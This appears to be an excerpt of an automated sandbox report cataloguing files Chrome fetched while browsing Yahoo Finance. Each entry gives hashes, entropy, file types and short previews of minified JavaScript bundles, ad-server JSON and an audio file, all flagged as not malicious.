                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.347990076408563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:9Npy1r1nvV8QlCsOje5n+pFqSCJGq4Y1HESLezXqNimaiz7ekDR3f8F4:eBvV8QQsOyrIqBAX2imaizKc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:56D1F5357BB189583765434A5F24AF76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E9337454C940A8A726597D25FD7C517B7D35739C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:664EA793B11D14B85E39C167D3404271735A2BAE369AA89881C3DBB62510F9B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FBEACEF25E4EC7AEF79042F55663379BDFCCE1D001587EF05C65942E49E3C8891E60A48C832B67E7FD81CE5B4CBE96390C88E878BD0113985538D6A402BF5DD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/with-all-vendors-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[477],{9057:(e,t,n)=>{"use strict";e.exports=n(25157)},25157:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r,o=n(80648),i=n(90567),u=(r=n(49183))&&"object"==typeof r&&"default"in r?r.default:r,a=n(18989);function l(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.key,r)}}function c(e,t,n){return t&&l(e.prototype,t),n&&l(e,n),e}var s=function(){function e(){this.stack=[]}var t=e.prototype;return t.setActive=function(e){this.stack[this.lastIndex]=e},t.setFocusActive=function(e){var t=this;return this.stack.unshift(e),function(){t.stack=t.stack.filter((function(t){return t!==e}))}},c(e,[{key:"current",get:function(){return this.stack[0]}},{key:"backgroundModule",get:function(){return this.stack[this.lastIndex]}},{key:"lastIndex",get:function(){return Math.max(0,this.stack.length-1)}}]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (855)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2806084270315035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:WrRvsVILEWA4a2VR/m2u/dxS7a5NFISbMbHl4a5Vo:iRv3EeVROHFVFIdDlo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8720A858E7727C57B51D6F2F147017E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0D68844FB964FDCB6BC925E28613A43B974CDD91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A83223F3D0B2F0AC5C39D4BA792A8792D7F2A78301CB1419ACC8AC7D2815E5C7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8E1BA0F27711FCE659BBA6B30192467186D810926877DBA2F9E382332FF9A1B79423711CFF3D4D6588CB03484EE8C975DB87CE8E5D03C8BABC6360717D7C47C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as p,d as y}from"./commonUtil.BWwawKjd.js";import{l as m,f as P}from"./logUtil.CCV3qKPL.js";async function R(t,s){const{body:n,m_id:o,ctrl:a,m_mode:c="json",forceLoad:f=!1,service:u}=s,{customKey:d}=n||{customKey:void 0},r=d?`${o}.${a}.${d}`:`${o}.${a}`;if(!o||!a){const e=new Error("Bad request for loadRMP");return m(t,s,{data:e,perfLabel:`loadRMP:${r}`}),Promise.reject(e)}const[i]=await p(["rmp"],t);if(!f){const e=i.getState();if(e[r])return Promise.resolve(e[r])}try{const e=await y(t),l=await P(t,{isRelative:!0,pathname:"/xhr/rmp",perfLabel:`loadRMP:${r}`,query:{ctrl:a,m_id:o,m_mode:c,service:u||""}},{body:JSON.stringify({...n,...e,ctrl:a,environment:"production",m_id:o,m_mode:c}),credentials:"include",method:"POST"});return i.loadRmp(r,l),l}catch(e){return m(t,s,{data:e,perfLabel:`loadRMP:${r}`}),i.setError(r),null}}export{R as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (40218)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):40312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.657840266464649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:31VprQr3wORKimw4hMg8Ph5BZ+sIgNEAwTJl64a7gxwKRBEtztWz7:5rwRKzw4hMg8Pv2gWJtZwGBx3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C597112CAFCE2EE4327872C46E05E162
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:802EE76B2550D0E2125A20376E42B3F0B6615EB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E05824F3203E899BEA610EEE8E5A584FCC62616515F8454D9CD86065F3C2F8D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:62D1A2EDCD6A52C6BCDBF9236135C213041BFA75E5F68E7B19C3FD01D317B63C400C273E153DAE8A676A2D59C4D4A8B5BB507DFDEDFE9A4DB0D6C72E871D62EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-a4fe50fb.b4fe53ca741b44fe2502.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[254],{8978:(t,e,r)=>{var i=r(4603);r(1235);o[578658]=function(){for(var t=2;9!==t;)switch(t){case 2:t="object"==typeof globalThis?1:5;break;case 1:return globalThis;case 5:var e;try{for(var r=2;6!==r;)switch(r){case 9:delete e.v9LZn,delete Object.prototype.kCQ7J,r=6;break;case 3:throw"";case 4:r="undefined"==typeof v9LZn?3:9;break;case 2:Object.defineProperty(Object.prototype,"kCQ7J",{get:function(){return this},configurable:!0}),(e=kCQ7J).v9LZn=e,r=4}}catch(i){e=window}return e}}(),o.u3uUq=function(){return"(D7/+0$Y%0A/17%20%5E=,0%0A%20D7&-%20.X%1B173(D'%1D2;&g17,=%22Y%0Am%007)K&%0010$k%20%1D:1'C:&%0E&.Z11*-%1FB;0*:%20G1%1D;,1C&&-%0A/E#%1D%001/K6/;0%1FM17%12=%22O:0;%1F$S%0A%1C915t',,%20%1FL&%2231%0DE7(7:&t6**%1E.C:%1Ddt%1FZ869=/Y%0A3?&2O%0A3+')t'32=5t'32=5t%00%17%12%0A3O06=1%1FF1-9%20)t%3C1;2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (29594), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.176931694017593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:U9ohsHpxsgDD9G9uiQ9xYBEgH5CDE486Cfiniln7dB1Qg7Nx6/SRRzLC78eA1bOr:U4gDRNgtmSiniln7dB1QSm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B4808C249D200DF8BCDB043AC4611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:80F6F690F592E8E1975CB27B9281B6F49FA81C66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:117A49648BFB149AE0636D4C6397DADBE8AAAB4EE5BB8A35DB9318379B7F6CA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD1124DD9EADDB5B10AAF23C4D270C06A4FF98C15542F38D7C878EE7DD4947EC42FB54838A5B8E2F3C5D80B0086503CE16BBB157F630C517998EA1646C05234E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-autocomplete",[],t):"object"==typeof exports?exports["wafer-autocomplete"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-autocomplete"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(i){if(a[i])return a[i].exports;var n=a[i]={i:i,l:!1,exports:{}};return e[i].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i=window.webpackJsonpwafer_wafers_wafer_autocomplete;window.webpackJsonpwafer_wafers_wafer_autocomplete=function(t,a,r){for(var o,s,l=0,u=[];l<t.length;l++)s=t[l],n[s]&&u.push(n[s][0]),n[s]=0;for(o in a)Object.prototype.hasOwnProperty.call(a,o)&&(e[o]=a[o]);for(i&&i(t,a,r);u.length;)u.shift()()};var a={},n={1:0,2:0};return t.e=function(e){function i(){s.onerror=s.onload=null,clearTimeout(l);var t=n[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),n[e]=void 0)}var a=n[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.152569011092753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHNlWRNgMwn6W9fbG4:YEOBtMrgr6W95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC05FCFEDB17DE965F08D6060E720AEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A888888659F0E92AC129CC80AEE7D78B8E1FC5CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9F1CF0A1DC03D8D39619D772B1E0C246D0B600B5D6364081744822D584831535
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC96D54C0D92919B175D5B1A2E1CA4B808930F96A1BA02F77F3129BC83EAC414814722C0F8E4983244711CAB7D967D5B0866E3C522D9158EA0CD5C2CD56D07F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ups.analytics.yahoo.com/ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8473)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354424350055239
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:UijEk47MwlVjC1D083rLsCZEl9h92+gxxFEjkpgt:UTkZwlV+1D0KnsCilV9g3+jM+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6A14DCE56AE547FB7170FA7BE41612D5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BB1957BD14802CF4A014230298AA3F78D4F9B63D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C1E50F75B73D677553A43FE1C6B41391A257896DEE4ECD022164C192E66B0A74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A93107EFB95795A419091E825FE03BC5D5773392059BCC9436ACBC0F7CBFA146733605BCDA5473A9942DAFBB68FBB1085097C011592AE551AE3A7E1769642E3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadPortfolios.CP0EWCgJ.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a9 as A,aa as nt,d as R,h as G,ab as rt,ac as at,c as j,j as z,K as ot,ad as it,s as st,a0 as lt,ae as ut,af as x,ag as ft,a1 as ct,ah as ht}from"./commonUtil.BWwawKjd.js";import{l as F,f as $}from"./logUtil.CCV3qKPL.js";import{l as Z}from"./loadQuote.BOFhtUlf.js";var dt=200,Q="__lodash_hash_undefined__",pt=1/0,_t="[object Function]",gt="[object GeneratorFunction]",mt=/[\\^$.*+?()[\]{}|]/g,yt=/^\[object .+?Constructor\]$/,bt=typeof A=="object"&&A&&A.Object===Object&&A,wt=typeof self=="object"&&self&&self.Object===Object&&self,U=bt||wt||Function("return this")();function vt(t,e){var n=t?t.length:0;return!!n&&St(t,e,0)>-1}function It(t,e,n,r){for(var i=t.length,a=n+-1;++a<i;)if(e(t[a],a,t))return a;return-1}function St(t,e,n){if(e!==e)return It(t,Ct,n);for(var r=n-1,i=t.length;++r<i;)if(t[r]===e)return r;return-1}function Ct(t){return t!==t}function Lt(t,e){return t.has(e)}function Pt(t,e){return t==null?void 0:t[e]}function Ot(t){var e=!1;if(t!=null&&typeof t.toString!="function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):85336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.402515364470518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:cc/sLIWm0N5TTkS8NjHCEr3pReyJ0TFJz1fLtGCJL7:fsNdkSWH/0TFJzhLtTJX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F35AD0C20D2F7E02B99E4866A98989D1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7E9960316F3EB5BC7B5F2FDA0B761ACF0CA898B1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:86145E56E9B4BD3A42E3DDF6B7CB6BC8E9372891AA5BAE35EA0F3FACDA3C99AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:253FE78F7EA21143F4C8D0FEDBB29EB3DEBF6B08E5ECAB1CF2A4C0DEE1F80D9A870E6847AA9FB9A39D8D2F4E601594B633869B2FE77F8A1C3363372E6FF477CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/misc/voice-error-202105050733.wav:2f81efb76bc949:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFFPM..WAVEfmt ........D... b.... .dataX...T'%.wwj.4.!...c..9...Z.....G]Q..L....G.....g.;...}./.-....#.S+...~.....9....h....0.............3.....aX..a.`.D7.b....G84......8@].?e.8.l 9~..9.C.9.X&9q.+:.j=9.ul:..S9w4.:HQj9...:H9.9.T.:V..9.1.:A.9>..;...9.U.;.].9.";.g.9...;p..9..:;.H.:..E;...:..O;.r.:J8Y;1u":..a;.Q+:..i;..2:.so;..8:Q.t;r.<:..x;.V?:..{;o.?:.};..>:. ~;..;:.v};(.6:.{;.a0:{.x;.(:Y.t;u..:..o;...:w.i;...:.pb;.&.:r^Z;.n.9.YQ;...9HjG;A..9R.<;...9..1;42.9..$;...9...;...9ZD.;...9.d.:.V.9sM.:jHx9.S.:.i]9..:..?9..~:s .9.=:[..8...9Ud.8..e9.:.8A..........B...Q)..a...s.R..?C..#..\..4P......l..j{...=.9.N...j...Y...YU.........Z+.d....\7.."...B..Q'...L.I.*.-.U.~J,...^...,.<+e...,..3k.?W+.-/p...)..#t..b'...w...%...x..."...y... .Z.y.....L.x......Ov..`....s..2....n..2...Mi..!..h.b.x....[..0...9S.<...`.J.`...C.?.....].5..c..)I).7{...... ..g...c.eX...5...?.y..J...Rm.y...v[,......l...K..5..w......7.E..z..8.;J..$.9s4~9.yN9...: ..9N:C:..9..:.J.9vy.:..9nR.:t&.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12433), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.202182615598781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3cmi6DAQ/946S4Y4+A09psvNYh8EhatYwQ:MTYxRY46psvNYh+Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9EC69A2055C595F415EADE096A476B0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:472B77037C2765E09666F43CCFBC01EF40783571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4F06D94CB6038F42F5C8D59D369AB21C3C54643A544B0824582CB00EBB61DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EC87EFA9D26546AD67D9CB65932AF47D8FBA77D0298E1567E2A11DB679BE045C761C3A6ADC131CC44BDBC7D95C522982FA9EE9F221155BB1FD2E38864E25EC3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-toggle"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):33462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.836807850159993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:j9JDhDZ358Io2xKN0RxKwrDqbh3f0megR7hNlDqgPO84sKIoyAbS:bFx+pZPr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9647699110C722DFA50745A582A25F60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CF1D9689FF0AD347F44FA307BDA752A27958F86F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9871D36AB8449E06A5A9282E3EF5E23A17974780CB70789B10FD434C9F4F2107
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:92F36864FE03CF172616DE9DD10FE74E0185F788083F3AE5ABD00C7802A2BE70F0C892A0BD874CFD0CC43F10B4C2DEBCFED9A5F89F6F0511B99B7FC7EA09C825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=3211675272074836&correlator=2987963728863457&eid=44809527%2C31087350%2C31084270&output=ldjh&gdfp_req=1&vrg=202409240101&ptt=17&impl=fifs&gdpr=0&us_privacy=1YNN&gpp_sid=-1&iu_parts=22888152279%2Cus%2Cyfin%2Cros%2Cdt%2Cus_yfin_ros_dt_top_center&enc_prev_ius=%2F0%2F1%2F2%2F3%2F4%2F5&prev_iu_szs=3x1%7C970x250%7C728x90&ifi=1&sfv=1-0-40&fsfs=1&fsbs=1&eri=5&sc=1&cookie_enabled=1&abxe=1&dt=1727716925252&adxs=147&adys=24&biw=1263&bih=907&scr_x=0&scr_y=0&btvi=0&ucis=1&oid=2&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&u_tz=-240&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&url=https%3A%2F%2Ffinance.yahoo.com%2Fsectors%2Fbasic-materials%2F&vis=1&psz=1263x5478&msz=1263x298&fws=0&ohw=0&td=1&egid=1261&topics=1&tps=1&htps=10&nt=1&psd=WzE1LFtdLG51bGwsM10.&dlt=1727716879323&idt=43100&ppid=792d504d4f703374684532754c687979385146426b414b47714e674c767a6e6547347e41&prev_scp=loc%3Dtop_center%26hb_pb100%3Dfalse%26hb_adomain%3Drelated.nativeinfoline.com%26hb_format%3Dbanner%26hb_source%3Dclient%26hb_size%3D970x250%26hb_pb%3D1.42%26hb_adid%3D232dde92c445a0a%26hb_bidder%3Dmedianet&cust_params=abk%3D0%26bucket%3Drocket_GA_desk_test-3-v1%252Csixty-sec-reserved-refresh-control%252Cyf-smartasset-msg-b%252Cypf-new-article-template-release-exp-v2%252Cyf-portfoliodetail-experiment%26cobrand%3Dnone%26colo%3Dir2%26device%3Ddesktop%26lang%3Den-US%26lu%3D0%26region%3DUS%26site%3Dfinance%26ver%3Dnimbus%26usercountry%3DUS%26hashtag%3Dbasic-materials%26pct%3Dsectors%26pg_name%3Dbasic-materials%26pt%3Dutility%26spaceid%3D1197812728%26axid%3DPEWVATKPOAZXI2CFGJ2UY2DZPE4FCRSCNNAUWR3RJZTUY5T2NZSUOND6IE%26bka%3D0%26ay_floor_g%3Dmodel%2520not%2520loaded%26ay_floor_m%3Dmodel%2520not%2520loaded%26ay_floor_s%3Dmodel%2520not%2520loaded%26hb_uid_mod%3Dliveintentid_on_not_enriched%26li-module-enabled%3Dt1-e0%26lr_env%3Dno-id&adks=1820292226&frm=20&eoidce=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"/22888152279/us/yfin/ros/dt/us_yfin_ros_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=af4c79248cd39e3c:T=1727716926:RT=1727716926:S=ALNI_MadfbF8hoebOTNcZnKve1GsjvR55Q",1761412926,"/","yahoo.com",1],["UID=00000efef77eafad:T=1727716926:RT=1727716926:S=ALNI_MZmhBvbc1plc-YpFAZL8Tc7w5ze4Q",1761412926,"/","yahoo.com",2]],[138466991471],[6637103456],[5462617191],[3473844160],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsmofVLDeKeVrou4Ig4Mq17SkOhaEfW7VOg95pTHH50nlvIlys0gqlbd-FQGbZE9xnrY0crLHrK9vfcE1MuUJxjwnqbsjG284NPadkPjrCOmjAew","CK3zt42X64gDFYO4_Qcd-HcbPQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qO4bvK0rKGnuMVqRTmr-xmdc64_A9iDMAogHW6i1mOBh0VodCTvAkMlii-yYwhqLDEsnTcI8nXjqGZO5O4oc_XX-UElxH7eLL4Dy84OmzB-UpXP",null,null,1,null,null,null,[["ID=b012b950cd92193f:T=1727716926:RT=1727716926:S=AA-AfjbB3tk1ryrl2mYclsZT20dP",1743268926,"/","yahoo.com"]],[]]}.<!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3619)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.320465094507183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:HlXHmzd99EXLTvQMklrqIP27b0/r2UzJU2GZMLtilAzlvj:pSS3yFq/Cr2q5L0iJj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4CF1929C2E92CEA2F92E739CAB4D5B8A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EE1FE60952E6FBC4DEADEF4D24770BE32D6D01E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:570B957C5C1FF7271F7D4D2ADAC5262736E3A6193D128C185D57EA4E35D7C5A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D581DCACA8D14AE1FB37F8CEDA26B95F95A8EF21448F54759432C79F74EE081B64B1EB42BE978DE1AAAAE9FC41397B54D492AEC8A4B80F76C8453F3BABD87BDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-47fdab56.72496606dc8a36c24e8b.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[8560],{1598:(e,t,i)=>{i.r(t);var a=i(4603);i(1414);var r,s;r="undefined"!=typeof window?window:i.g,(s=void 0!==a.mE?a.mE:r.CIQ).Studies?(s.Studies.calculateTypicalPrice=function(e,t){var i=t.chart.scrubbed,a=t.days;if(i.length<a+1)t.overlay||(t.error=!0);else{var r=t.name;for(var s in t.outputs)r=s+" "+r;var n="hlc/3";"Med Price"==t.type?n="hl/2":"Weighted Close"==t.type&&(n="hlcc/4");var l=0;t.startFrom<=a&&(t.startFrom=0);for(var o=t.startFrom;o<i.length;o++)o&&i[o-1][r]&&(l=i[o-1][r]*a),l+=i[o][n],o>=a&&(l-=i[o-a][n],i[o][r]=l/a)}},s.Studies.studyLibrary=s.extend(s.Studies.studyLibrary,{"Med Price":{name:"Median Price",calculateFN:s.Studies.calculateTypicalPrice,inputs:{Period:14}}})):console.error("medianPrice feature requires first activating studies feature.")},5748:(e,t,i)=>{i.r(t);var
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (739)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.965079169000081
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:M+Ld4NTJSgMcjz3JK2T2p/VuJ2FE06pY2entHV06ktp065AREGgC0Ggtln:MB/7jz5Zg/VATCntHV6tpkyCCtl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7FD4B577ADA080D7407B9D8F011BF26D
